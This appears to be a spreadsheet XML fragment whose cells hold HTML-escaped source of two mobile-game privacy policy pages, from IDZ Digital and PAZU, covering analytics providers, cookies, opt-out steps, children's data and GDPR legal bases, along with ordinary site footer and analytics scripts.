	&lt;p class="para" &gt;Amazon - Privacy Policy: &lt;a class="numb" href="https://www.amazon.co.uk/gp/help/customer/display.html/ref=footer_privacy?ie=UTF8&amp;nodeId=201909010" target="_blank"&gt;https://www.amazon.co.uk/gp/help/customer/display.html/ref=footer_privacy?ie=UTF8&amp;nodeId=201909010 &lt;/a&gt;&lt;br&gt;_x005F_x000D_
	Opt out: &lt;a class="numb" href="https://www.amazon.co.uk/adprefs"target="_blank"&gt;https://www.amazon.co.uk/adprefs&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Analytics:&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt; We make use of analytics services like Flurry, Google, Appsee, Mixpanel or Facebook that use cookies sent from our app running in your device in order to provide Non-Personal anonymous global data and information regarding app use. The kind of information collected includes the type of device or version of the OS you are using, app crash report, and general pattern of app use.</t>
  </si>
  <si>
    <t>Appsee also records a certain percentage of app sessions in the form of videos without displaying any user input or saving any personal information. We use this data to improve the app and related services over time so that we can serve our users better. It should be noted that at NO point in time shall your Personal Information be linked to the cookies or videos (Non-Personal Information) sent from your device to the analytics services so that your privacy is always kept protected.</t>
  </si>
  <si>
    <t>Flurry, Appsee, Mixpanel and Facebook have their own Privacy Policies for the information they collect from the device via an app. Nonetheless, we seek to protect the integrity of our site and welcome any feedback about these sites.&lt;/br&gt;_x005F_x000D_
	 The links to their Privacy Policies are given below:&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;p class="para" &gt;Flurry Analytics Privacy Policy: &lt;a class="numb" href = "https://policies.yahoo.com/us/en/yahoo/privacy/index.htm" target="_blank"&gt;https://policies.yahoo.com/us/en/yahoo/privacy/index.htm&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;p class="para" &gt;Appsee Privacy Policy:</t>
  </si>
  <si>
    <t>&lt;a class="numb" href = " https://www.appsee.com/legal/privacypolicy" target="_blank"&gt; https://www.appsee.com/legal/privacypolicy&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;p class="para" &gt;Facebook Analytics Privacy Policy:&lt;a class="numb" href = "https://www.facebook.com/policy.php" target="_blank"&gt;https://www.facebook.com/policy.php&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
	_ x000D_
	&lt;p class="para" &gt;Mixpanel Privacy Policy: &lt;a class="numb" href = "https://mixpanel.com/privacy/" target="_blank"&gt;https://mixpanel.com/privacy/&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;p class="para" &gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We may send you push notifications via OneSignal service. No personal information is passed on to them at any point of time. &lt;br&gt;_x005F_x000D_
	</t>
  </si>
  <si>
    <t>One Signal Privacy Policy: &lt;a class="numb" href = "https://onesignal.com/privacy_policy" target="_blank"&gt;https://onesignal.com/privacy_policy&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;p class="para" &gt;Google Firebase&lt;br&gt;_x005F_x000D_
	We use the tool Firebase in some of our apps. This is a real-time database that we use for real-time data exchange and storage in our app to improve and develop our app. The user data is transmitted to Firebase anonymously.</t>
  </si>
  <si>
    <t>Firebase is a Google subsidiary and is based in San Francisco (CA), USA.&lt;br&gt;_x005F_x000D_
	Find the Firebase privacy policy here: &lt;a class="numb" href = "https://www.firebase.com/terms/privacy-policy.html" target="_blank"&gt;https://www.firebase.com/terms/privacy-policy.html&lt;/a&gt; &lt;/p&gt;_x005F_x000D_
	_ x000D_
	&lt;p class="para" &gt;In all of the above cases and purposes, we may analyze, profile and segment all collected data in anonymized form.&lt;/p&gt;_x005F_x000D_
	_ x000D_
	&lt;h2 class="main-h2"&gt;Cookies:&lt;/h2&gt;_x005F_x000D_
	&lt;p</t>
  </si>
  <si>
    <t>class="para" &gt; We do not set any cookies on your device. Third party advertising or analytics providers mentioned above may set cookies.</t>
  </si>
  <si>
    <t>You may get your data deleted from them via the opt out links provided.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Internet permissions:&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt;Our apps do typically require internet permissions, for the purpose of downloading additional content for the app, providing links to the app store entry of our other apps, display advertising wherever applicable and to collect anonymous usage information for analytics as mentioned above.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Advertising:&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt; We may occasionally promote other products within our apps.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;In-app purchases:&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt; Our apps may contain in-app purchases (IAP’s) or Subscriptions.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Social media:&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt;Our apps interact with social sites like Facebook, Instagram, Whatsapp, etc to share content from our apps/websites.</t>
  </si>
  <si>
    <t>At no point of time do we collect any information from your social media accounts in any way.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Non-Advertising based apps:&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt; In case of apps in which no third party ads are there, then the above points related to advertising and ad providers do not apply.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Other companies and public authorities:&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt;In order to combat fraud and illegal activity, we may exchange data with other companies and organizations and provide it to public authorities in response to lawful requests.&lt;/br&gt;_x005F_x000D_
	 We may also disclose your data based on your consent, to comply with the law or to protect the rights, property or safety of us, our players or others.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;p class="para" &gt;OPTING OUT&lt;/br&gt;_x005F_x000D_
	If you no longer want us to use your IP address and mobile advertising ID then you need to either pay for the in-app purchases to remove advertisements or stop using the apps.</t>
  </si>
  <si>
    <t>As mentioned before, for EU users we are not showing targeted/personalized ads.&lt;/br&gt;&lt;/br&gt;_x005F_x000D_
_x005F_x000D_
	 For more choices please follow the “Opt Out” link for the respective service above.&lt;/br&gt;&lt;/br&gt;_x005F_x000D_
	_x005F_x000D_
	 If you wish to opt-out of personalized ads, you can opt-out anytime through the app or your phone settings.</t>
  </si>
  <si>
    <t>Just follow these steps:&lt;/br&gt;&lt;/br&gt;&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;For Android Devices&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt;1) Go to Phone Settings.&lt;/br&gt;_x005F_x000D_
	2) Tap on Google.&lt;/br&gt;_x005F_x000D_
	3) Select Ads.&lt;/br&gt;_x005F_x000D_
	4) Switch on "Opt-out of personalized ads".&lt;/br&gt;&lt;/br&gt;_x005F_x000D_
	 &lt;/p&gt;_x005F_x000D_
	&lt;h2 class="main-h2"&gt;For iOS Devices&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt;	1. Open the Settings app.&lt;/br&gt;_x005F_x000D_
	2.</t>
  </si>
  <si>
    <t>Tap Privacy.&lt;/br&gt;_x005F_x000D_
	3. Scroll down to the bottom of the page and tap Advertising.&lt;/br&gt;_x005F_x000D_
	4. Tap Reset Advertising Identifier.&lt;/br&gt;_x005F_x000D_
	5.</t>
  </si>
  <si>
    <t>When prompted, tap Reset Advertising Identifier.&lt;/br&gt;_x005F_x000D_
	&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Age limitations:&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt;We do not knowingly collect or solicit personal data about or direct or target interest-based advertising to anyone under the age of 13 or knowingly allow such persons to use our Services. If you are under 13, please do not send any data about yourself to us, including your name, address, telephone number, or email address. No one under the age of 13 may provide any personal data.</t>
  </si>
  <si>
    <t>If we learn that we have collected personal data about a child under age 13, we will delete that data as quickly as possible. If you believe that we might have any data from or about a child under the age of 13, please contact us.&lt;/br&gt;_x005F_x000D_
	We do not knowingly contact or do business with children under 13 years of age. If a parent/guardian becomes aware that a child under the age of 13 has attempted to contact and/or do business with us, please advise us by email at &lt;a class="numb" href="/cdn-cgi/l/email-protection#b4c7c1c4c4dbc6c0f4ddd0ced0ddd3ddc0d5d89ad7dbd9"&gt;&lt;span class="__cf_email__" data-cfemail="f88b8d8888978a8cb8919c829c919f918c9994d69b9795"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>so that we may rectify the situation.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Changes to Privacy Policy:&lt;/h2&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;p class="para" &gt; We reserve the right to modify our Privacy Policy at any time simply by posting such modification on this site and without any other notification. Any such modification will be effective immediately upon posting on this site.</t>
  </si>
  <si>
    <t>&lt;/br&gt;_x005F_x000D_
	 The use of the information we collect is always subject to the Privacy Policy that is in effect at the time when this information is collected. You are advised to refer to the Privacy Policy from time to time so that you are always in sync with our current privacy practices.&lt;/p&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Contact Us:&lt;/h2&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;p cclass="para" &gt;</t>
  </si>
  <si>
    <t>If there are any questions regarding this privacy policy, you may contact us using the information below.&lt;br&gt;_x005F_x000D_
	IDZ Digital Private Limited&lt;br&gt;_x005F_x000D_
	607, Western Edge II, Borivali East, Mumbai 400066, India&lt;br&gt;_x005F_x000D_
	Email: support at idzdigital.com (Replace at with @ and remove spaces)&lt;br&gt;_x005F_x000D_
	&lt;/p&gt;_x005F_x000D_
								_x005F_x000D_
	&lt;p class="para" &gt; This Privacy Policy was last modified on May 30, 2018.&lt;/p&gt;&lt;br&gt;_x005F_x000D_
  &lt;/div&gt;	_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;style&gt;_x005F_x000D_
.socio-icons {width:48px;}_x005F_x000D_
.list-group-item {_x005F_x000D_
    padding: .75rem 0.25rem;_x005F_x000D_
}_x005F_x000D_
.pis0 {padding-inline-start: 0px;}_x005F_x000D_
.d-inflex {display: inline-flex;}_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;footer class=" text-center text-md-left padpurple" style="background-color:#F3F3F3;padding-top:10px;padding-bottom:10px;"&gt;_x005F_x000D_
  &lt;div class="container"&gt;_x005F_x000D_
	&lt;div class="row"&gt;_x005F_x000D_
	  &lt;div class="col-md-6"&gt;_x005F_x000D_
		&lt;a style="color:#000;" href="https://www.idzdigital.com/"&gt;&lt;img class="img-fluid logos" src="img/Logo-footer.png" alt="IDZ Logo"&gt; &lt;/a&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	  &lt;div class="col-md-6 text-center text-md-right"  &gt;_x005F_x000D_
		&lt;ul class="pis0 d-inflex flex-wrap list-group-horizontal"&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://www.facebook.com/idzdigital/" target="_blank" &gt;&lt;img class="socio-icons"  src="img/fb-icon.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://in.linkedin.com/company/idzdigital" target="_blank"&gt;&lt;img class="socio-icons"  src="img/linkedin-icon.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://www.youtube.com/channel/UCk648MRsOAP7uzD1HEqPC5g" target="_blank"&gt;&lt;img class="socio-icons"  src="img/youtube-icon.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://www.instagram.com/idz_digital/" target="_blank"&gt;&lt;img class="socio-icons"  src="img/insta.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://twitter.com/IDZDigital" target="_blank"&gt;&lt;img class="socio-icons"  src="img/twitter.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
	&lt;div class="row" style="padding-top:2%"&gt;_x005F_x000D_
	  &lt;div class="col-md-6"&gt;	_x005F_x000D_
		&lt;p style="font-size:20px;padding-top: .75rem;padding-left:5px;"&gt;© 2017-2023 &lt;a class="purple" href="https://www.idzdigital.com/" &gt;IDZ Digital Pvt.</t>
  </si>
  <si>
    <t>Ltd.&lt;/a&gt; All Rights Reserved.&lt;/p&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	  &lt;div class="col-md-6 text-center text-md-right" &gt;_x005F_x000D_
		&lt;ul class="pis0 d-inflex flex-wrap list-group-horizontal"&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;margin-right: 20px;"&gt;&lt;a class="purple" href="terms_of_service.php" style="text-decoration:none;font-size:20px;"&gt;Terms of service&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a class="purple" href="privacypolicy.php" style="text-decoration:none;font-size:20px;"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
&lt;/footer&gt;_x005F_x000D_
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="./js/jquery.min.js"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
_x005F_x000D_
	(function($) { "use strict";_x005F_x000D_
_x005F_x000D_
	  $(function() {_x005F_x000D_
		var header = $(".start-style");_x005F_x000D_
		$(window).scroll(function() {    _x005F_x000D_
			var scroll = $(window).scrollTop();_x005F_x000D_
		_x005F_x000D_
			if (scroll &gt;= 10) {_x005F_x000D_
				header.removeClass('start-style').addClass("scroll-on");_x005F_x000D_
			} else {_x005F_x000D_
				header.removeClass("scroll-on").addClass('start-style');_x005F_x000D_
			}_x005F_x000D_
		});_x005F_x000D_
	  });		_x005F_x000D_
		_x005F_x000D_
    })(jQuery); _x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;_x005F_x000D_
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-186060183-1"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
  window.dataLayer = window.dataLayer || [];_x005F_x000D_
  function gtag(){dataLayer.push(arguments);}_x005F_x000D_
  gtag('js', new Date());_x005F_x000D_
_x005F_x000D_
  gtag('config', 'UA-186060183-1');_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>Default Statcounter code for Idzdigital.com_x005F_x000D_
 http://idzdigital.com --&gt;_x005F_x000D_
&lt;script type="text/javascript"&gt;_x005F_x000D_
var sc_project=11610447; _x005F_x000D_
var sc_invisible=1; _x005F_x000D_
var sc_security="92b2e226"; _x005F_x000D_
&lt;/script&gt;_x005F_x000D_
 &lt;script type="text/javascript"_x005F_x000D_
src="https://www.statcounter.com/counter/counter.js"_x005F_x000D_
async&gt;&lt;/script&gt;_x005F_x000D_
&lt;noscript&gt;&lt;div class="statcounter"&gt;&lt;a title="Web Analytics_x005F_x000D_
Made Easy - StatCounter" href="https://statcounter.com/"_x005F_x000D_
target="_blank"&gt;&lt;img class="statcounter"_x005F_x000D_
src="https://c.statcounter.com/11610447/0/92b2e226/1/"_x005F_x000D_
alt="Web Analytics Made Easy -_x005F_x000D_
StatCounter"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/noscript&gt;_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>End of Statcounter Code --&gt;_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
  &lt;head&gt;
    &lt;meta charset="utf-8" /&gt;
    &lt;title&gt;PAZU World&lt;/title&gt;
    &lt;meta
      name="viewport"
      content="width=device-width, initial-scale=1, shrink-to-fit=no"
    /&gt;
    &lt;meta name="description" content="Site description will be here" /&gt;
    &lt;link rel="icon" href="../images/fav-icon.png" /&gt;
    &lt;link rel="stylesheet" type="text/css" href="../css/bootstrap.min.css" /&gt;
    &lt;link rel="stylesheet" type="text/css" href="../css/owl.carousel.min.css" /&gt;
    &lt;link
      href="https://kit-pro.fontawesome.com/releases/v5.15.2/css/pro.min.css"
      rel="stylesheet"
    /&gt;
    &lt;link rel="stylesheet" href="../css/default-edit.css" /&gt;
    &lt;link rel="stylesheet" type="text/css" href="../style.css" /&gt;
    &lt;link rel="stylesheet" type="text/css" href="../css/responsive.css" /&gt;
    &lt;! --End ALL STYLESHEET --&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;!-- preloader --&gt;
    &lt;div id="preloader"&gt;&lt;/div&gt;
    &lt;!-- preloader-end --&gt;
    &lt;!-- main-wrap --&gt;
    &lt;div class="main-wrap"&gt;
      &lt;!-- offcanvas-start --&gt;
      &lt;div class="offcanvas-menu"&gt;
        &lt;div class="offmenu" id="menuParent"&gt;
          &lt;div class="offmenu-head"&gt;
            &lt;a href="../index.html"</t>
  </si>
  <si>
    <t>class="offmenu-logo"
              &gt;&lt;img src="../images/logo-short.svg" alt=""
            /&gt;&lt;/a&gt;
            &lt;a href="#" class="offcanvas-close"&gt;&lt;i class="fal fa-times"&gt;&lt;/i&gt;&lt;/a&gt;
          &lt;/div&gt;
          &lt;ul class="offmenu-nav"&gt;
            &lt;li&gt;&lt;a href=".. /career.html"&gt;Careers&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href=".. /game-lobby.html"&gt;Games&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="..</t>
  </si>
  <si>
    <t>/support-page.html"&gt;Support&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href=".. /about.html"&gt;About us&lt;/a&gt;&lt;/li&gt;
            &lt;li class="border-bottom-0"&gt;
              &lt;a class="link fw-600 pb-0" href="#" id="sign-in-h"&gt;Sign in&lt;/a&gt;
            &lt;/li&gt;
            &lt;li class="d-flex border-bottom-0 pt-0"&gt;
              &lt;a href="#" class="default-button button bg-white"
                &gt;Try for free&lt;/a
              &gt;
            &lt;/li&gt;
          &lt;/ul&gt;
        &lt;/div&gt;
      &lt;/div&gt;
      &lt;div class="offcanvas-overlay"&gt;&lt;/div&gt;
      &lt;!-- offcanvas-start-end --&gt;
      &lt;!-- header-section --&gt;
      &lt;header class="header-section"&gt;
        &lt;div class="header-section-inner"&gt;
          &lt;a href="../index.html"</t>
  </si>
  <si>
    <t>class="header-logo"&gt;
            &lt;img
              class="d-lg-block d-none"
              src="../images/pazu-logo.svg"
              alt=""
            /&gt;
            &lt;img
              class="d-lg-none d-block"
              src="../images/logo-short.svg"
              alt=""
              style="width: initial"
            /&gt;
          &lt;/a&gt;
          &lt;div class="main-menu ms-auto d-lg-block d-none"&gt;
            &lt;ul&gt;
              &lt;li&gt;&lt;a href=".. /career.html"&gt;Careers&lt;/a&gt;&lt;/li&gt;
              &lt;li&gt;&lt;a href=".. /game-lobby.html"&gt;Games&lt;/a&gt;&lt;/li&gt;
              &lt;li&gt;&lt;a href="..</t>
  </si>
  <si>
    <t>/support-page.html"&gt;Support&lt;/a&gt;&lt;/li&gt;
              &lt;li&gt;&lt;a href=".. /about.html"&gt;About us&lt;/a&gt;&lt;/li&gt;
            &lt;/ul&gt;
          &lt;/div&gt;
          &lt;div class="header-right d-lg-block d-none"&gt;
            &lt;a class="link" href="#" id="sign-in-h"&gt;Sign in&lt;/a&gt;
            &lt;a href="../product.html" class="default-button button"
              &gt;Try for free&lt;/a
            &gt;
          &lt;/div&gt;
          &lt;a
            href="javascript:void(0)"
            class="offcanvas-open ms-auto d-lg-none d-block"
          &gt;
             &lt;i class="far fa-bars"&gt;&lt;/i&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;/header&gt;
      &lt;!</t>
  </si>
  <si>
    <t xml:space="preserve">--End header-section --&gt;
      &lt;!-- main --&gt;
      &lt;main&gt;
        &lt;!-- ts-hero-section --&gt;
        &lt;section class="ts-hero-section ts-hero-2"&gt;
          &lt;div class="container"&gt;
            &lt;div class="ts-hero-inner"&gt;
              &lt;img
                style="--this-width: 348px"
                src="../images/pp-shape1.png"
                alt=""
                class="pp-shape1 ts-hero-shape"
              /&gt;
              &lt;img
                style="--this-width: 527px"
                src="../images/pp-shape2.png"
                alt=""
                class="pp-shape2 ts-hero-shape"
              /&gt;
              &lt;div class="ts-hero-content ts-hero-content-2"&gt;
                &lt;h1 class="h1"&gt;
                  &lt;img
                    src="../images/privacy-policy-h1-shape.png"
                    alt=""
                    class="shape2"
                  /&gt;
                  &lt;span class="txt"
                    &gt;Privacy &lt;br class="d-lg-none d-block" /&gt;
                    policy&lt;/span
                  &gt;
                &lt;/h1&gt;
                &lt;p&gt;Effective Date: April 17, 2019&lt;/p&gt;
              &lt;/div&gt;
            &lt;/div&gt;
          &lt;/div&gt;
        &lt;/section&gt;
        &lt;!-- ts-hero-section-end --&gt;
        &lt;!-- txt-a-section --&gt;
        &lt;section class="text-a-section section-a-mod2"&gt;
          &lt;div class="container"&gt;
            &lt;div class="txt-a-section-inner"&gt;
              &lt;p class="mb-a"&gt;
                PAZU ("us", "we", or "our") operates the mobile application
                (hereinafter referred to as the "Service").
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;p class="mb-a"&gt;
                This page informs you of our policies regarding the collection,
                use and disclosure of personal data when you use our Service and
                the choices you have associated with that data.
               &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                We use your data to provide and improve the Service. By using
                the Service, you agree to the collection and use of information
                in accordance with this policy.
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;p class="mb-c"&gt;
                Unless otherwise defined in this Privacy Policy, the terms used
                in this Privacy Policy have the same meanings as in our Terms
                and Conditions.
               &lt;/p&gt;
              &lt;h3 class="mb-a1"&gt;Definitions&lt;/h3&gt;
              &lt;h5 class="mb-a1"&gt;Service&lt;/h5&gt;
              &lt;p class="mb-a1"&gt;
                Service is the mobile application operated by PAZU
              &lt;/p&gt;
              &lt;h5 class="mb-a1"&gt;Personal Data&lt;/h5&gt;
              &lt;p class="mb-a1"&gt;
                 Personal Data means data about a living individual who can be
                identified from those data (or from those and other information
                either in our possession or likely to come into our possession).
              </t>
  </si>
  <si>
    <t>&lt;/p&gt;
              &lt;h5 class="mb-a1"&gt;Usage Data&lt;/h5&gt;
              &lt;p class="mb-a1"&gt;
                Usage Data is data collected automatically either generated by
                the use of the Service or from the Service infrastructure itself
                (for example, the duration of a page visit).
               &lt;/p&gt;
              &lt;h5 class="mb-a1"&gt;Cookies&lt;/h5&gt;
              &lt;p class="mb-a1"&gt;
                Cookies are small files stored on your device (computer or
                mobile device).
               &lt;/p&gt;
              &lt;h5 class="mb-a1"&gt;Data</t>
  </si>
  <si>
    <t xml:space="preserve">Controller&lt;/h5&gt;
              &lt;p class="mb-a1"&gt;
                Data Controller means the natural or legal person who (either
                alone or jointly or in common with other persons) determines the
                purposes for which and the manner in which any personal
                information are, or are to be, processed.
               &lt;/p&gt;
              &lt;p class="mb-a1"&gt;
                 For the purpose of this Privacy Policy, we are a Data Controller
                of your Personal Data.
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;h5 class="mb-a1"&gt;Data Processors (or Service Providers)&lt;/h5&gt;
              &lt;p class="mb-a1"&gt;
                Data Processor (or Service Provider) means any natural or legal
                person who processes the data on behalf of the Data Controller.
               &lt;/p&gt;
              &lt;p class="mb-a1"&gt;
                 We may use the services of various Service Providers in order to
                process your data more effectively.
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;h5 class="mb-a1"&gt;Data Subject (or User)&lt;/h5&gt;
              &lt;p class="mb-c"&gt;
                Data Subject is any living individual who is using our Service
                and is the subject of Personal Data.
               &lt;/p&gt;
              &lt;h3 class="mb-a1"&gt;Information Collection and Use&lt;/h3&gt;
              &lt;p class="mb-c"&gt;
                We collect several different types of information for various
                purposes to provide and improve our Service to you.
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;h3 class="mb-b"&gt;Types of Data Collected&lt;/h3&gt;
              &lt;h5 class="mb-a"&gt;Personal Data&lt;/h5&gt;
              &lt;p class="mb-a"&gt;
                While using our Service, we may ask you to provide us with
                certain personally identifiable information that can be used to
                contact or identify you ("Personal Data"). Personally,
                identifiable information may include, but is not limited to:
              &lt;/p&gt;
               &lt;p class="mb-b"&gt;
                * Cookies and Usage Data &lt;br /&gt;
                * Email AddressUsage Data
              &lt;/p&gt;
              &lt;h5 class="mb-a"&gt;Usage Data&lt;/h5&gt;
              &lt;p class="mb-c"&gt;
                </t>
  </si>
  <si>
    <t>When you access the Service with a mobile device, we may collect
                certain information automatically, including, but not limited
                to, the type of mobile device is used, your mobile device unique
                ID, the IP address of your mobile device, your mobile operating
                system, the type of mobile Internet browser you use, unique
                device identifiers, and other diagnostic data ("Usage Data").
               &lt;/p&gt;
              &lt;h3 class="mb-a1"&gt;Tracking &amp; Cookies Data&lt;/h3&gt;
              &lt;p class="mb-a1"&gt;
                We use cookies and similar tracking technologies to track the
                activity on our Service and we hold certain information.
               &lt;/p&gt;
              &lt;p class="mb-a1"&gt;
                Cookies are files with a small amount of data which may include
                an anonymous unique identifier.</t>
  </si>
  <si>
    <t>Cookies are sent to your browser
                from a website and stored on your device. Other tracking
                technologies are also used such as beacons, tags and scripts to
                collect and track information and to improve and analyse our
                Service.
               &lt;/p&gt;
              &lt;p class="mb-c"&gt;
                You can instruct your browser to refuse all cookies or to
                indicate when a cookie is being sent.</t>
  </si>
  <si>
    <t xml:space="preserve">However, if you do not
                accept cookies, you may not be able to use some portions of our
                Service.
               &lt;/p&gt;
              &lt;h5 class="mb-a1"&gt;Examples of Cookies we use:&lt;/h5&gt;
              &lt;ul class="ul-x"&gt;
                &lt;li class="mb-a1"&gt;
                  Session Cookies. We use Session Cookies to operate our
                  Service.
                </t>
  </si>
  <si>
    <t>&lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                  Preference Cookies. We use Preference Cookies to remember your
                  preferences and various settings.
                 &lt;/li&gt;
                &lt;li class="mb-c"&gt;
                  Security Cookies.</t>
  </si>
  <si>
    <t xml:space="preserve">We use Security Cookies for security
                  purposes.
                 &lt;/li&gt;
              &lt;/ul&gt;
              &lt;h3 class="mb-a1"&gt;Use of Data&lt;/h3&gt;
              &lt;ul class="ul-x"&gt;
                &lt;li class="mb-a1"&gt;
                   PAZU uses the collected data for various purposes:
                &lt;/li&gt;
                &lt;li class="mb-a1"&gt;To provide and maintain our Service.&lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                  To notify you about changes to our Service.
                </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                  To allow you to participate in interactive features of our
                  Service when you choose to do so.
                 &lt;/li&gt;
                &lt;li class="mb-a1"&gt;To provide customer support.&lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                  To gather analysis or valuable information so that we can
                  improve our Service.
                 &lt;/li&gt;
                &lt;li class="mb-a1"&gt;To monitor the usage of our Service.&lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                  To detect, prevent and address technical issues.
                </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
                &lt;li class="mb-c"&gt;
                   To send you an email with promotional information about our
                  games or any other offers from us to you; unless you have
                  opted out of receiving such information.
                 &lt;/li&gt;
              &lt;/ul&gt;
              &lt;h3 class="mb-a1"&gt;
                Legal Basis for Processing Personal Data under the General Data
                Protection Regulation (GDPR)
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/h3&gt;
              &lt;p class="mb-a1"&gt;
                 If you are from the European Economic Area (EEA), PAZU legal
                basis for collecting and using the personal information
                described in this Privacy Policy depends on the Personal Data we
                collect and the specific context in which we collect it.
               &lt;/p&gt;
              &lt;ul class="ul-x"&gt;
                &lt;li class="mb-a1"&gt;
                  PAZU may process your Personal Data because:
                &lt;/li&gt;
                &lt;li class="mb-a1"&gt;We need to perform a contract with you.&lt;/li&gt;
                &lt;li class="mb-a1"&gt;You have given us permission to do so.&lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                  </t>
  </si>
  <si>
    <t>The processing is in our legitimate interests and it is not
                  overridden by your rights.
                 &lt;/li&gt;
